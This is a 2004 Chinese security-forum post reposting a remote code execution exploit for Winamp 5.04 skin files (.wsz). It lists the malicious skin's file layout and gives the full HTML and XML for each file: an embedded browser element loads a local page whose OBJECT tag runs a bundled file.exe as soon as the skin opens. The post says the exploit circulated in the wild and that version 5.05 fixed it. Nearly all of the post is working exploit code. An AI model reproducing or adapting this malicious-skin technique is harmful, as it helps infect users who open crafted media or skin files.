Winamp 5.04 Skin File (.wsz) Remote Code Execution Exploit

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6825
精华: 834
积分: 36073
阅读权限: 255
性别: 男
来自: 中国
在线时间: 591 小时
注册时间: 2004-6-25
最后登录: 2008-10-12

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-8-29 01:26 只看该作者

Winamp 5.04 Skin File (.wsz) Remote Code Execution Exploit

信息来源：0day exp

This exploit is known to be circulating in the wild

Update (08/28/2004) - Nullsoft fixed this flaw and released a new version of Winamp (v5.05)
skinhead.wsz (skinhead.zip)
-----------------------------
/frame/
/maki/
/shade/
/html/
/html/file.exe (malicious file to execute)
/html/test.htm (html to load the .exe)
/player/
/player/Thumbs.db
/xml/
/xml/includes.xml
/xml/player-normal.xml
/xml/player.xml
/skin.xml

/html/test.htm
----------------

复制内容到剪贴板

代码:

<html>

<OBJECT NAME=&#39;X&#39; CLASSID=&#39;CLSID:11111111-1111-1111-1111-111111111123&#39; CODEBASE=&#39;file.exe&#39;>

</html>

/xml/includes.xml
-------------------

复制内容到剪贴板

代码:

<include file="player.xml"/>

/xml/player-normal.xml
-------------------------

复制内容到剪贴板

代码:

<layout>

<browser id="browser" x="0" y="0" w="0" h="0" relatw="1" relath="1" url="file:///@SKINPATH@html/test.htm" />

</layout>

/xml/player.xml
-----------------

复制内容到剪贴板

代码:

<container id="main" name="main">

<include file="player-normal.xml"/>

</container>

/skin.xml
---------

复制内容到剪贴板

代码:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>



<WinampAbstractionLayer version="1.1">

<skininfo>

<version>1.0</version>

<name>Batman</name>

<comment></comment>

<author>Petrol Designs</author>

<email>[email]info@petroldesigns.com[/email]</email>

<homepage>[url]http://www.petroldesigns.com</homepage>[/url]

</skininfo>



<include file="xml/includes.xml"/>

<!-- 

-->

</WinampAbstractionLayer>

qq310926是我唯一用号，除此之外有其他号码号自称邪八冰血封情，则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Winamp 5.04 Skin File (.wsz) Remote Code Execution Exploit